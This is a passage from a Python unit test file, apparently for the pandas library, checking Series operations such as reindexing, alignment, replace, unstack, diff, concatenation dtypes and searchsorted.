join='right')\n rb[:3] = 5\n self.assertFalse((b[:3] == 5).any())\n\n # do not copy\n a = self.ts.copy()\n b = self.ts[:5].copy()\n _, rb = a.align(b, join='right', copy=False)\n rb[:2] = 5\n self.assertTrue((b[:2] == 5).all())\n\n def test_align_sameindex(self):\n a, b = self.ts.align(self.ts, copy=False)\n self.assertIs(a.index, self.ts.index)\n self.assertIs(b.index, self.ts.index)\n\n # a, b = self.ts.align(self.ts, copy=True)\n # self.assertIsNot(a.index, self.ts.index)\n # self.assertIsNot(b.index, self.ts.index)\n\n def test_reindex(self):\n\n identity = self.series.reindex(self.series.index)\n\n # __array_interface__ is not defined for older numpies\n # and on some pythons\n try:\n self.assertTrue(np.may_share_memory(self.series.index, identity.index))\n except (AttributeError):\n pass\n\n self.assertTrue(identity.index.is_(self.series.index))\n self.assertTrue(identity.index.identical(self.series.index))\n\n subIndex = self.series.index[10:20]\n subSeries = self.series.reindex(subIndex)\n\n for idx, val in compat.iteritems(subSeries):\n self.assertEqual(val, self.series[idx])\n\n subIndex2 = self.ts.index[10:20]\n subTS = self.ts.reindex(subIndex2)\n\n for idx, val in compat.iteritems(subTS):\n self.assertEqual(val, self.ts[idx])\n stuffSeries = self.ts.reindex(subIndex)\n\n self.assertTrue(np.isnan(stuffSeries).all())\n\n # This is extremely important for the Cython code to not screw up\n nonContigIndex = self.ts.index[::2]\n subNonContig = self.ts.reindex(nonContigIndex)\n for idx, val in compat.iteritems(subNonContig):\n self.assertEqual(val, self.ts[idx])\n\n # return a copy the same index here\n result = self.ts.reindex()\n self.assertFalse((result is self.ts))\n\n def test_reindex_corner(self):\n # (don't forget to fix this) I think it's fixed\n reindexed_dep = self.empty.reindex(self.ts.index, method='pad')\n\n # corner case: pad empty series\n reindexed = self.empty.reindex(self.ts.index, method='pad')\n\n # pass non-Index\n reindexed = self.ts.reindex(list(self.ts.index))\n assert_series_equal(self.ts, reindexed)\n\n # bad fill method\n ts = self.ts[::2]\n self.assertRaises(Exception, ts.reindex, self.ts.index, method='foo')\n\n def test_reindex_pad(self):\n\n s = Series(np.arange(10),dtype='int64')\n s2 = s[::2]\n\n reindexed = s2.reindex(s.index, method='pad')\n reindexed2 = s2.reindex(s.index, method='ffill')\n assert_series_equal(reindexed, reindexed2)\n\n expected = Series([0, 0, 2, 2, 4, 4, 6, 6, 8, 8], index=np.arange(10))\n assert_series_equal(reindexed, expected)\n\n # GH4604\n s = Series([1,2,3,4,5], index=['a', 'b', 'c', 'd', 'e'])\n new_index = ['a','g','c','f']\n expected = Series([1,1,3,3],index=new_index)\n\n # this changes dtype because the ffill happens after\n result = s.reindex(new_index).ffill()\n assert_series_equal(result, expected.astype('float64'))\n\n result = s.reindex(new_index).ffill(downcast='infer')\n assert_series_equal(result, expected)\n\n # invalid because we can't forward fill on this type of index\n self.assertRaises(ValueError, lambda : s.reindex(new_index, method='ffill'))\n\n # inferrence of new dtype\n s = Series([True,False,False,True],index=list('abcd'))\n new_index='agc'\n result = s.reindex(list(new_index)).ffill()\n expected = Series([True,True,False],index=list(new_index))\n assert_series_equal(result, expected)\n\n # GH4618 shifted series downcasting\n s = Series(False,index=lrange(0,5))\n result = s.shift(1).fillna(method='bfill')\n expected = Series(False,index=lrange(0,5))\n assert_series_equal(result, expected)\n\n def test_reindex_backfill(self):\n pass\n\n def test_reindex_int(self):\n ts = self.ts[::2]\n int_ts = Series(np.zeros(len(ts), dtype=int), index=ts.index)\n\n # this should work fine\n reindexed_int = int_ts.reindex(self.ts.index)\n\n # if NaNs introduced\n self.assertEqual(reindexed_int.dtype, np.float_)\n\n # NO NaNs introduced\n reindexed_int = int_ts.reindex(int_ts.index[::2])\n self.assertEqual(reindexed_int.dtype, np.int_)\n\n def test_reindex_bool(self):\n\n # A series other than float, int, string, or object\n ts = self.ts[::2]\n bool_ts = Series(np.zeros(len(ts), dtype=bool), index=ts.index)\n\n # this should work fine\n reindexed_bool = bool_ts.reindex(self.ts.index)\n\n # if NaNs introduced\n self.assertEqual(reindexed_bool.dtype, np.object_)\n\n # NO NaNs introduced\n reindexed_bool = bool_ts.reindex(bool_ts.index[::2])\n self.assertEqual(reindexed_bool.dtype, np.bool_)\n\n def test_reindex_bool_pad(self):\n # fail\n ts = self.ts[5:]\n bool_ts = Series(np.zeros(len(ts), dtype=bool), index=ts.index)\n filled_bool = bool_ts.reindex(self.ts.index, method='pad')\n self.assertTrue(isnull(filled_bool[:5]).all())\n\n def test_reindex_like(self):\n other = self.ts[::2]\n assert_series_equal(self.ts.reindex(other.index),\n self.ts.reindex_like(other))\n\n # GH 7179\n day1 = datetime(2013,3,5)\n day2 = datetime(2013,5,5)\n day3 = datetime(2014,3,5)\n\n series1 = Series([5, None, None],[day1, day2, day3])\n series2 = Series([None, None], [day1, day3])\n\n result = series1.reindex_like(series2, method='pad')\n expected = Series([5, np.nan], index=[day1, day3])\n assert_series_equal(result, expected)\n\n def test_reindex_fill_value(self):\n #------------------------------------------------------------\n # floats\n floats = Series([1., 2., 3.])\n result = floats.reindex([1, 2, 3])\n expected = Series([2., 3., np.nan], index=[1, 2, 3])\n assert_series_equal(result, expected)\n\n result = floats.reindex([1, 2, 3], fill_value=0)\n expected = Series([2., 3., 0], index=[1, 2, 3])\n assert_series_equal(result, expected)\n\n #------------------------------------------------------------\n # ints\n ints = Series([1, 2, 3])\n\n result = ints.reindex([1, 2, 3])\n expected = Series([2., 3., np.nan], index=[1, 2, 3])\n assert_series_equal(result, expected)\n\n # don't upcast\n result = ints.reindex([1, 2, 3], fill_value=0)\n expected = Series([2, 3, 0], index=[1, 2, 3])\n self.assertTrue(issubclass(result.dtype.type, np.integer))\n assert_series_equal(result, expected)\n\n #------------------------------------------------------------\n # objects\n objects = Series([1, 2, 3], dtype=object)\n\n result = objects.reindex([1, 2, 3])\n expected = Series([2, 3, np.nan], index=[1, 2, 3], dtype=object)\n assert_series_equal(result, expected)\n\n result = objects.reindex([1, 2, 3], fill_value='foo')\n expected = Series([2, 3, 'foo'], index=[1, 2, 3], dtype=object)\n assert_series_equal(result, expected)\n\n #------------------------------------------------------------\n # bools\n bools = Series([True, False, True])\n\n result = bools.reindex([1, 2, 3])\n expected = Series([False, True, np.nan], index=[1, 2, 3], dtype=object)\n assert_series_equal(result, expected)\n\n result = bools.reindex([1, 2, 3], fill_value=False)\n expected = Series([False, True, False], index=[1, 2, 3])\n assert_series_equal(result, expected)\n\n def test_rename(self):\n renamer = lambda x: x.strftime('%Y%m%d')\n renamed = self.ts.rename(renamer)\n self.assertEqual(renamed.index[0], renamer(self.ts.index[0]))\n\n # dict\n rename_dict = dict(zip(self.ts.index, renamed.index))\n renamed2 = self.ts.rename(rename_dict)\n assert_series_equal(renamed, renamed2)\n\n # partial dict\n s = Series(np.arange(4), index=['a', 'b', 'c', 'd'], dtype='int64')\n renamed = s.rename({'b': 'foo', 'd': 'bar'})\n self.assert_numpy_array_equal(renamed.index, ['a', 'foo', 'c', 'bar'])\n\n # index with name\n renamer = Series(\n np.arange(4), index=Index(['a', 'b', 'c', 'd'], name='name'), dtype='int64')\n renamed = renamer.rename({})\n self.assertEqual(renamed.index.name, renamer.index.name)\n\n def test_rename_inplace(self):\n renamer = lambda x: x.strftime('%Y%m%d')\n expected = renamer(self.ts.index[0])\n\n self.ts.rename(renamer, inplace=True)\n self.assertEqual(self.ts.index[0], expected)\n\n def test_preserveRefs(self):\n seq = self.ts[[5, 10, 15]]\n seq[1] = np.NaN\n self.assertFalse(np.isnan(self.ts[10]))\n\n def test_ne(self):\n ts = Series([3, 4, 5, 6, 7], [3, 4, 5, 6, 7], dtype=float)\n expected = [True, True, False, True, True]\n self.assertTrue(tm.equalContents(ts.index != 5, expected))\n self.assertTrue(tm.equalContents(~(ts.index == 5), expected))\n\n def test_pad_nan(self):\n x = Series([np.nan, 1., np.nan, 3., np.nan],\n ['z', 'a', 'b', 'c', 'd'], dtype=float)\n\n x.fillna(method='pad', inplace=True)\n\n expected = Series([np.nan, 1.0, 1.0, 3.0, 3.0],\n ['z', 'a', 'b', 'c', 'd'], dtype=float)\n assert_series_equal(x[1:], expected[1:])\n self.assertTrue(np.isnan(x[0]), np.isnan(expected[0]))\n\n def test_unstack(self):\n from numpy import nan\n from pandas.util.testing import assert_frame_equal\n\n index = MultiIndex(levels=[['bar', 'foo'], ['one', 'three', 'two']],\n labels=[[1, 1, 0, 0], [0, 1, 0, 2]])\n\n s = Series(np.arange(4.), index=index)\n unstacked = s.unstack()\n\n expected = DataFrame([[2., nan, 3.], [0., 1., nan]],\n index=['bar', 'foo'],\n columns=['one', 'three', 'two'])\n\n assert_frame_equal(unstacked, expected)\n\n unstacked = s.unstack(level=0)\n assert_frame_equal(unstacked, expected.T)\n\n index = MultiIndex(levels=[['bar'], ['one', 'two', 'three'], [0, 1]],\n labels=[[0, 0, 0, 0, 0, 0],\n [0, 1, 2, 0, 1, 2],\n [0, 1, 0, 1, 0, 1]])\n s = Series(np.random.randn(6), index=index)\n exp_index = MultiIndex(levels=[['one', 'two', 'three'], [0, 1]],\n labels=[[0, 1, 2, 0, 1, 2],\n [0, 1, 0, 1, 0, 1]])\n expected = DataFrame({'bar': s.values}, index=exp_index).sortlevel(0)\n unstacked = s.unstack(0)\n assert_frame_equal(unstacked, expected)\n\n # GH5873\n idx = pd.MultiIndex.from_arrays([[101, 102], [3.5, np.nan]])\n ts = pd.Series([1,2], index=idx)\n left = ts.unstack()\n right = DataFrame([[nan, 1], [2, nan]], index=[101, 102],\n columns=[nan, 3.5])\n assert_frame_equal(left, right)\n\n idx = pd.MultiIndex.from_arrays([['cat', 'cat', 'cat', 'dog', 'dog'],\n ['a', 'a', 'b', 'a', 'b'], [1, 2, 1, 1, np.nan]])\n ts = pd.Series([1.0, 1.1, 1.2, 1.3, 1.4], index=idx)\n right = DataFrame([[1.0, 1.3], [1.1, nan], [nan, 1.4], [1.2, nan]],\n columns=['cat', 'dog'])\n tpls = [('a', 1), ('a', 2), ('b', nan), ('b', 1)]\n right.index = pd.MultiIndex.from_tuples(tpls)\n assert_frame_equal(ts.unstack(level=0), right)\n\n def test_sortlevel(self):\n mi = MultiIndex.from_tuples([[1, 1, 3], [1, 1, 1]], names=list('ABC'))\n s = Series([1, 2], mi)\n backwards = s.iloc[[1, 0]]\n\n res = s.sortlevel('A')\n assert_series_equal(backwards, res)\n\n res = s.sortlevel(['A', 'B'])\n assert_series_equal(backwards, res)\n\n res = s.sortlevel('A', sort_remaining=False)\n assert_series_equal(s, res)\n\n res = s.sortlevel(['A', 'B'], sort_remaining=False)\n assert_series_equal(s, res)\n\n def test_head_tail(self):\n assert_series_equal(self.series.head(), self.series[:5])\n assert_series_equal(self.series.tail(), self.series[-5:])\n\n def test_isin(self):\n s = Series(['A', 'B', 'C', 'a', 'B', 'B', 'A', 'C'])\n\n result = s.isin(['A', 'C'])\n expected = Series([True, False, True, False, False, False, True, True])\n assert_series_equal(result, expected)\n\n def test_isin_with_string_scalar(self):\n # GH4763\n s = Series(['A', 'B', 'C', 'a', 'B', 'B', 'A', 'C'])\n with tm.assertRaises(TypeError):\n s.isin('a')\n\n with tm.assertRaises(TypeError):\n s = Series(['aaa', 'b', 'c'])\n s.isin('aaa')\n\n def test_isin_with_i8(self):\n # GH 5021\n\n expected = Series([True,True,False,False,False])\n expected2 = Series([False,True,False,False,False])\n\n # datetime64[ns]\n s = Series(date_range('jan-01-2013','jan-05-2013'))\n\n result = s.isin(s[0:2])\n assert_series_equal(result, expected)\n\n result = s.isin(s[0:2].values)\n assert_series_equal(result, expected)\n\n # fails on dtype conversion in the first place\n result = s.isin(s[0:2].values.astype('datetime64[D]'))\n assert_series_equal(result, expected)\n\n result = s.isin([s[1]])\n assert_series_equal(result, expected2)\n\n result = s.isin([np.datetime64(s[1])])\n assert_series_equal(result, expected2)\n\n # timedelta64[ns]\n s = Series(pd.to_timedelta(lrange(5),unit='d'))\n result = s.isin(s[0:2])\n assert_series_equal(result, expected)\n\n#------------------------------------------------------------------------------\n# TimeSeries-specific\n def test_cummethods_bool(self):\n # GH 6270\n # looks like a buggy np.maximum.accumulate for numpy 1.6.1, py 3.2\n def cummin(x):\n return np.minimum.accumulate(x)\n\n def cummax(x):\n return np.maximum.accumulate(x)\n\n a = pd.Series([False, False, False, True, True, False, False])\n b = ~a\n c = pd.Series([False] * len(b))\n d = ~c\n methods = {'cumsum': np.cumsum, 'cumprod': np.cumprod,\n 'cummin': cummin, 'cummax': cummax}\n args = product((a, b, c, d), methods)\n for s, method in args:\n expected = Series(methods[method](s.values))\n result = getattr(s, method)()\n assert_series_equal(result, expected)\n\n e = pd.Series([False, True, nan, False])\n cse = pd.Series([0, 1, nan, 1], dtype=object)\n cpe = pd.Series([False, 0, nan, 0])\n cmin = pd.Series([False, False, nan, False])\n cmax = pd.Series([False, True, nan, True])\n expecteds = {'cumsum': cse, 'cumprod': cpe, 'cummin': cmin,\n 'cummax': cmax}\n\n for method in methods:\n res = getattr(e, method)()\n assert_series_equal(res, expecteds[method])\n\n def test_replace(self):\n N = 100\n ser = Series(np.random.randn(N))\n ser[0:4] = np.nan\n ser[6:10] = 0\n\n # replace list with a single value\n ser.replace([np.nan], -1, inplace=True)\n\n exp = ser.fillna(-1)\n assert_series_equal(ser, exp)\n\n rs = ser.replace(0., np.nan)\n ser[ser == 0.] = np.nan\n assert_series_equal(rs, ser)\n\n ser = Series(np.fabs(np.random.randn(N)), tm.makeDateIndex(N),\n dtype=object)\n ser[:5] = np.nan\n ser[6:10] = 'foo'\n ser[20:30] = 'bar'\n\n # replace list with a single value\n rs = ser.replace([np.nan, 'foo', 'bar'], -1)\n\n self.assertTrue((rs[:5] == -1).all())\n self.assertTrue((rs[6:10] == -1).all())\n self.assertTrue((rs[20:30] == -1).all())\n self.assertTrue((isnull(ser[:5])).all())\n\n # replace with different values\n rs = ser.replace({np.nan: -1, 'foo': -2, 'bar': -3})\n\n self.assertTrue((rs[:5] == -1).all())\n self.assertTrue((rs[6:10] == -2).all())\n self.assertTrue((rs[20:30] == -3).all())\n self.assertTrue((isnull(ser[:5])).all())\n\n # replace with different values with 2 lists\n rs2 = ser.replace([np.nan, 'foo', 'bar'], [-1, -2, -3])\n assert_series_equal(rs, rs2)\n\n # replace inplace\n ser.replace([np.nan, 'foo', 'bar'], -1, inplace=True)\n\n self.assertTrue((ser[:5] == -1).all())\n self.assertTrue((ser[6:10] == -1).all())\n self.assertTrue((ser[20:30] == -1).all())\n\n ser = Series([np.nan, 0, np.inf])\n assert_series_equal(ser.replace(np.nan, 0), ser.fillna(0))\n\n ser = Series([np.nan, 0, 'foo', 'bar', np.inf, None, lib.NaT])\n assert_series_equal(ser.replace(np.nan, 0), ser.fillna(0))\n filled = ser.copy()\n filled[4] = 0\n assert_series_equal(ser.replace(np.inf, 0), filled)\n\n ser = Series(self.ts.index)\n assert_series_equal(ser.replace(np.nan, 0), ser.fillna(0))\n\n # malformed\n self.assertRaises(ValueError, ser.replace, [1, 2, 3], [np.nan, 0])\n\n # make sure that we aren't just masking a TypeError because bools don't\n # implement indexing\n with tm.assertRaisesRegexp(TypeError, 'Cannot compare types .+'):\n ser.replace([1, 2], [np.nan, 0])\n\n ser = Series([0, 1, 2, 3, 4])\n result = ser.replace([0, 1, 2, 3, 4], [4, 3, 2, 1, 0])\n assert_series_equal(result, Series([4, 3, 2, 1, 0]))\n\n # API change from 0.12?\n # GH 5319\n ser = Series([0, np.nan, 2, 3, 4])\n expected = ser.ffill()\n result = ser.replace([np.nan])\n assert_series_equal(result, expected)\n\n ser = Series([0, np.nan, 2, 3, 4])\n expected = ser.ffill()\n result = ser.replace(np.nan)\n assert_series_equal(result, expected)\n #GH 5797\n ser = Series(date_range('20130101', periods=5))\n expected = ser.copy()\n expected.loc[2] = Timestamp('20120101')\n result = ser.replace({Timestamp('20130103'):\n Timestamp('20120101')})\n assert_series_equal(result, expected)\n result = ser.replace(Timestamp('20130103'), Timestamp('20120101'))\n assert_series_equal(result, expected)\n\n def test_replace_with_single_list(self):\n ser = Series([0, 1, 2, 3, 4])\n result = ser.replace([1,2,3])\n assert_series_equal(result, Series([0,0,0,0,4]))\n\n s = ser.copy()\n s.replace([1,2,3],inplace=True)\n assert_series_equal(s, Series([0,0,0,0,4]))\n\n # make sure things don't get corrupted when fillna call fails\n s = ser.copy()\n with tm.assertRaises(ValueError):\n s.replace([1,2,3],inplace=True,method='crash_cymbal')\n assert_series_equal(s, ser)\n\n def test_replace_mixed_types(self):\n s = Series(np.arange(5),dtype='int64')\n\n def check_replace(to_rep, val, expected):\n sc = s.copy()\n r = s.replace(to_rep, val)\n sc.replace(to_rep, val, inplace=True)\n assert_series_equal(expected, r)\n assert_series_equal(expected, sc)\n\n # should NOT upcast to float\n e = Series([0,1,2,3,4])\n tr, v = [3], [3.0]\n check_replace(tr, v, e)\n\n # MUST upcast to float\n e = Series([0,1,2,3.5,4])\n tr, v = [3], [3.5]\n check_replace(tr, v, e)\n\n # casts to object\n e = Series([0,1,2,3.5,'a'])\n tr, v = [3,4], [3.5,'a']\n check_replace(tr, v, e)\n\n # again casts to object\n e = Series([0,1,2,3.5,Timestamp('20130101')])\n tr, v = [3,4],[3.5,Timestamp('20130101')]\n check_replace(tr, v, e)\n\n # casts to float\n e = Series([0,1,2,3.5,1])\n tr, v = [3,4],[3.5,True]\n check_replace(tr, v, e)\n\n # test an object with dates + floats + integers + strings\n dr = date_range('1/1/2001', '1/10/2001',\n freq='D').to_series().reset_index(drop=True)\n r = dr.astype(object).replace([dr[0],dr[1],dr[2]], [1.0,2,'a'])\n assert_series_equal(r, Series([1.0,2,'a'] +\n dr[3:].tolist(),dtype=object))\n\n def test_replace_bool_with_string_no_op(self):\n s = Series([True, False, True])\n result = s.replace('fun', 'in-the-sun')\n tm.assert_series_equal(s, result)\n\n def test_replace_bool_with_string(self):\n # nonexistent elements\n s = Series([True, False, True])\n result = s.replace(True, '2u')\n expected = Series(['2u', False, '2u'])\n tm.assert_series_equal(expected, result)\n\n def test_replace_bool_with_bool(self):\n s = Series([True, False, True])\n result = s.replace(True, False)\n expected = Series([False] * len(s))\n tm.assert_series_equal(expected, result)\n\n def test_replace_with_dict_with_bool_keys(self):\n s = Series([True, False, True])\n with tm.assertRaisesRegexp(TypeError, 'Cannot compare types .+'):\n s.replace({'asdf': 'asdb', True: 'yes'})\n\n def test_asfreq(self):\n ts = Series([0., 1., 2.], index=[datetime(2009, 10, 30),\n datetime(2009, 11, 30),\n datetime(2009, 12, 31)])\n\n daily_ts = ts.asfreq('B')\n monthly_ts = daily_ts.asfreq('BM')\n self.assert_numpy_array_equal(monthly_ts, ts)\n\n daily_ts = ts.asfreq('B', method='pad')\n monthly_ts = daily_ts.asfreq('BM')\n self.assert_numpy_array_equal(monthly_ts, ts)\n\n daily_ts = ts.asfreq(datetools.bday)\n monthly_ts = daily_ts.asfreq(datetools.bmonthEnd)\n self.assert_numpy_array_equal(monthly_ts, ts)\n\n result = ts[:0].asfreq('M')\n self.assertEqual(len(result), 0)\n self.assertIsNot(result, ts)\n\n def test_diff(self):\n # Just run the function\n self.ts.diff()\n\n # int dtype\n a = 10000000000000000\n b = a + 1\n s = Series([a, b])\n\n rs = s.diff()\n self.assertEqual(rs[1], 1)\n\n # neg n\n rs = self.ts.diff(-1)\n xp = self.ts - self.ts.shift(-1)\n assert_series_equal(rs, xp)\n\n # 0\n rs = self.ts.diff(0)\n xp = self.ts - self.ts\n assert_series_equal(rs, xp)\n\n # datetime diff (GH3100)\n s = Series(date_range('20130102', periods=5))\n rs = s - s.shift(1)\n xp = s.diff()\n assert_series_equal(rs, xp)\n\n # timedelta diff\n nrs = rs - rs.shift(1)\n nxp = xp.diff()\n assert_series_equal(nrs, nxp)\n\n def test_pct_change(self):\n rs = self.ts.pct_change(fill_method=None)\n assert_series_equal(rs, self.ts / self.ts.shift(1) - 1)\n\n rs = self.ts.pct_change(2)\n filled = self.ts.fillna(method='pad')\n assert_series_equal(rs, filled / filled.shift(2) - 1)\n\n rs = self.ts.pct_change(fill_method='bfill', limit=1)\n filled = self.ts.fillna(method='bfill', limit=1)\n assert_series_equal(rs, filled / filled.shift(1) - 1)\n\n rs = self.ts.pct_change(freq='5D')\n filled = self.ts.fillna(method='pad')\n assert_series_equal(rs, filled / filled.shift(freq='5D') - 1)\n\n def test_pct_change_shift_over_nas(self):\n s = Series([1., 1.5, np.nan, 2.5, 3.])\n\n chg = s.pct_change()\n expected = Series([np.nan, 0.5, np.nan, 2.5 / 1.5 - 1, .2])\n assert_series_equal(chg, expected)\n\n def test_autocorr(self):\n # Just run the function\n corr1 = self.ts.autocorr()\n\n # Now run it with the lag parameter\n corr2 = self.ts.autocorr(lag=1)\n\n # corr() with lag needs Series of at least length 2\n if len(self.ts) <= 2:\n self.assertTrue(np.isnan(corr1))\n self.assertTrue(np.isnan(corr2))\n else:\n self.assertEqual(corr1, corr2)\n\n # Choose a random lag between 1 and length of Series - 2\n # and compare the result with the Series corr() function\n n = 1 + np.random.randint(max(1, len(self.ts) - 2))\n corr1 = self.ts.corr(self.ts.shift(n))\n corr2 = self.ts.autocorr(lag=n)\n\n # corr() with lag needs Series of at least length 2\n if len(self.ts) <= 2:\n self.assertTrue(np.isnan(corr1))\n self.assertTrue(np.isnan(corr2))\n else:\n self.assertEqual(corr1, corr2)\n\n def test_first_last_valid(self):\n ts = self.ts.copy()\n ts[:5] = np.NaN\n\n index = ts.first_valid_index()\n self.assertEqual(index, ts.index[5])\n\n ts[-5:] = np.NaN\n index = ts.last_valid_index()\n self.assertEqual(index, ts.index[-6])\n\n ts[:] = np.nan\n self.assertIsNone(ts.last_valid_index())\n self.assertIsNone(ts.first_valid_index())\n\n ser = Series([], index=[])\n self.assertIsNone(ser.last_valid_index())\n self.assertIsNone(ser.first_valid_index())\n\n def test_mpl_compat_hack(self):\n result = self.ts[:, np.newaxis]\n expected = self.ts.values[:, np.newaxis]\n assert_almost_equal(result, expected)\n\n#------------------------------------------------------------------------------\n# GroupBy\n\n def test_select(self):\n n = len(self.ts)\n result = self.ts.select(lambda x: x >= self.ts.index[n // 2])\n expected = self.ts.reindex(self.ts.index[n // 2:])\n assert_series_equal(result, expected)\n\n result = self.ts.select(lambda x: x.weekday() == 2)\n expected = self.ts[self.ts.index.weekday == 2]\n assert_series_equal(result, expected)\n\n#------------------------------------------------------------------------------\n# Misc not safe for sparse\n\n def test_dropna_preserve_name(self):\n self.ts[:5] = np.nan\n result = self.ts.dropna()\n self.assertEqual(result.name, self.ts.name)\n name = self.ts.name\n ts = self.ts.copy()\n ts.dropna(inplace=True)\n self.assertEqual(ts.name, name)\n\n def test_numpy_unique(self):\n # it works!\n result = np.unique(self.ts)\n\n def test_concat_empty_series_dtypes_roundtrips(self):\n\n # round-tripping with self & like self\n dtypes = map(np.dtype,['float64','int8','uint8','bool','m8[ns]','M8[ns]'])\n\n for dtype in dtypes:\n self.assertEqual(pd.concat([Series(dtype=dtype)]).dtype, dtype)\n self.assertEqual(pd.concat([Series(dtype=dtype),\n Series(dtype=dtype)]).dtype, dtype)\n\n def int_result_type(dtype, dtype2):\n typs = set([dtype.kind,dtype2.kind])\n if not len(typs-set(['i','u','b'])) and (dtype.kind == 'i' or dtype2.kind == 'i'):\n return 'i'\n elif not len(typs-set(['u','b'])) and (dtype.kind == 'u' or dtype2.kind == 'u'):\n return 'u'\n return None\n\n def float_result_type(dtype, dtype2):\n typs = set([dtype.kind,dtype2.kind])\n if not len(typs-set(['f','i','u'])) and (dtype.kind == 'f' or dtype2.kind == 'f'):\n return 'f'\n return None\n\n def get_result_type(dtype, dtype2):\n result = float_result_type(dtype, dtype2)\n if result is not None:\n return result\n result = int_result_type(dtype, dtype2)\n if result is not None:\n return result\n return 'O'\n\n for dtype in dtypes:\n for dtype2 in dtypes:\n if dtype == dtype2:\n continue\n\n expected = get_result_type(dtype, dtype2)\n result = pd.concat([Series(dtype=dtype),\n Series(dtype=dtype2)]).dtype\n self.assertEqual(result.kind, expected)\n\n def test_concat_empty_series_dtypes(self):\n\n # bools\n self.assertEqual(pd.concat([Series(dtype=np.bool_),\n Series(dtype=np.int32)]).dtype, np.int32)\n self.assertEqual(pd.concat([Series(dtype=np.bool_),\n Series(dtype=np.float32)]).dtype, np.object_)\n\n # datetimelike\n self.assertEqual(pd.concat([Series(dtype='m8[ns]'),\n Series(dtype=np.bool)]).dtype, np.object_)\n self.assertEqual(pd.concat([Series(dtype='m8[ns]'),\n Series(dtype=np.int64)]).dtype, np.object_)\n self.assertEqual(pd.concat([Series(dtype='M8[ns]'),\n Series(dtype=np.bool)]).dtype, np.object_)\n self.assertEqual(pd.concat([Series(dtype='M8[ns]'),\n Series(dtype=np.int64)]).dtype, np.object_)\n self.assertEqual(pd.concat([Series(dtype='M8[ns]'),\n Series(dtype=np.bool_),\n Series(dtype=np.int64)]).dtype, np.object_)\n\n # categorical\n self.assertEqual(pd.concat([Series(dtype='category'),\n Series(dtype='category')]).dtype, 'category')\n self.assertEqual(pd.concat([Series(dtype='category'),\n Series(dtype='float64')]).dtype, np.object_)\n self.assertEqual(pd.concat([Series(dtype='category'),\n Series(dtype='object')]).dtype, 'category')\n\n # sparse\n result = pd.concat([Series(dtype='float64').to_sparse(),\n Series(dtype='float64').to_sparse()])\n self.assertEqual(result.dtype,np.float64)\n self.assertEqual(result.ftype,'float64:sparse')\n\n result = pd.concat([Series(dtype='float64').to_sparse(),\n Series(dtype='float64')])\n self.assertEqual(result.dtype,np.float64)\n self.assertEqual(result.ftype,'float64:sparse')\n\n result = pd.concat([Series(dtype='float64').to_sparse(),\n Series(dtype='object')])\n self.assertEqual(result.dtype,np.object_)\n self.assertEqual(result.ftype,'object:dense')\n\n def test_searchsorted_numeric_dtypes_scalar(self):\n s = Series([1, 2, 90, 1000, 3e9])\n r = s.searchsorted(30)\n e = 2\n tm.assert_equal(r, e)\n\n r = s.searchsorted([30])\n e = np.array([2])\n tm.assert_array_equal(r, e)\n\n def test_searchsorted_numeric_dtypes_vector(self):\n s = Series([1, 2, 90, 1000, 3e9])\n r = s.searchsorted([91, 2e6])\n e = np.array([3, 4])\n tm.assert_array_equal(r, e)\n\n def test_search_sorted_datetime64_scalar(self):\n s = Series(pd.date_range('20120101', periods=10, freq='2D'))\n v = pd.Timestamp('20120102')\n r = s.searchsorted(v)\n e = 1\n tm.assert_equal(r, e)\n\n def test_search_sorted_datetime64_list(self):\n s = Series(pd.date_range('20120101', periods=10, freq='2D'))\n v = [pd.Timestamp('20120102'), pd.Timestamp('20120104')]\n r = s.searchsorted(v)\n e = np.array([1, 2])\n tm.assert_array_equal(r, e)\n\n def test_searchsorted_sorter(self):\n # GH8490\n s = Series([3, 1, 2])\n r = s.searchsorted([0, 3], sorter=np.argsort(s))\n e = np.array([0, 2])\n tm.assert_array_equal(r, e)\n\n\n\nclass TestSeriesNonUnique(tm.TestCase):\n\n _multiprocess_can_split_ = True\n\n def setUp(self):\n pass\n\n def test_basic_indexing(self):\n s = Series(np.random.randn(5), index=['a', 'b', 'a', 'a', 'b'])\n\n self.assertRaises(IndexError, s.__getitem__, 5)\n self.assertRaises(IndexError, s.__setitem__, 5, 0)\n\n self.assertRaises(KeyError, s.__getitem__, 'c')\n\n s = s.sort_index()\n\n self.assertRaises(IndexError, s.__getitem__, 5)\n self.assertRaises(IndexError, s.__setitem__, 5, 0)\n\n\n def test_int_indexing(self):\n s = Series(np.random.randn(6), index=[0, 0, 1, 1, 2, 2])\n\n self.assertRaises(KeyError, s.__getitem__, 5)\n\n self.assertRaises(KeyError, s.__getitem__, 'c')\n\n # not monotonic\n s = Series(np.random.randn(6), index=[2, 2, 0, 0, 1, 1])\n\n self.assertRaises(KeyError, s.__getitem__, 5)\n\n self.assertRaises(KeyError, s.__getitem__, 'c')\n\n def test_datetime_indexing(self):\n from pandas import date_range\n\n index = date_range('1/1/2000', '1/7/2000')\n index = index.repeat(3)\n\n s = Series(len(index), index=index)\n stamp = Timestamp('1/8/2000')\n\n self.assertRaises(KeyError, s.__getitem__, stamp)\n s[stamp] = 0\n self.assertEqual(s[stamp], 0)\n\n # not monotonic\n s = Series(len(index), index=index)\n s = s[::-1]\n\n self.assertRaises(KeyError, s.__getitem__, stamp)\n s[stamp] = 0\n self.assertEqual(s[stamp], 0)\n\n def test_reset_index(self):\n df = tm.makeDataFrame()[:5]\n ser = df.stack()\n ser.index.names = ['hash', 'category']\n\n ser.name = 'value'\n df = ser.reset_index()\n self.assertIn('value', df)\n\n df = ser.reset_index(name='value2')\n self.assertIn('value2', df)\n\n # check inplace\n s = ser.reset_index(drop=True)\n s2 = ser\n s2.reset_index(drop=True, inplace=True)\n assert_series_equal(s, s2)\n\n # level\n index = MultiIndex(levels=[['bar'], ['one', 'two', 'three'], [0, 1]],\n labels=[[0, 0, 0, 0, 0, 0],\n [0, 1, 2, 0, 1, 2],\n [0, 1, 0, 1, 0, 1]])\n s = Series(np.random.randn(6), index=index)\n rs = s.reset_index(level=1)\n self.assertEqual(len(rs.columns), 2)\n\n rs = s.reset_index(level=[0, 2], drop=True)\n self.assertTrue(rs.index.equals(Index(index.get_level_values(1))))\n tm.assert_isinstance(rs, Series)\n\n def test_set_index_makes_timeseries(self):\n idx = tm.makeDateIndex(10)\n\n s = Series(lrange(10))\n s.index = idx\n\n self.assertTrue(s.is_time_series == True)\n\n def test_timeseries_coercion(self):\n idx = tm.makeDateIndex(10000)\n ser = Series(np.random.randn(len(idx)), idx.astype(object))\n self.assertTrue(ser.is_time_series)\n self.assertIsInstance(ser.index, DatetimeIndex)\n\n def test_replace(self):\n N = 100\n ser = Series(np.fabs(np.random.randn(N)), tm.makeDateIndex(N),\n dtype=object)\n 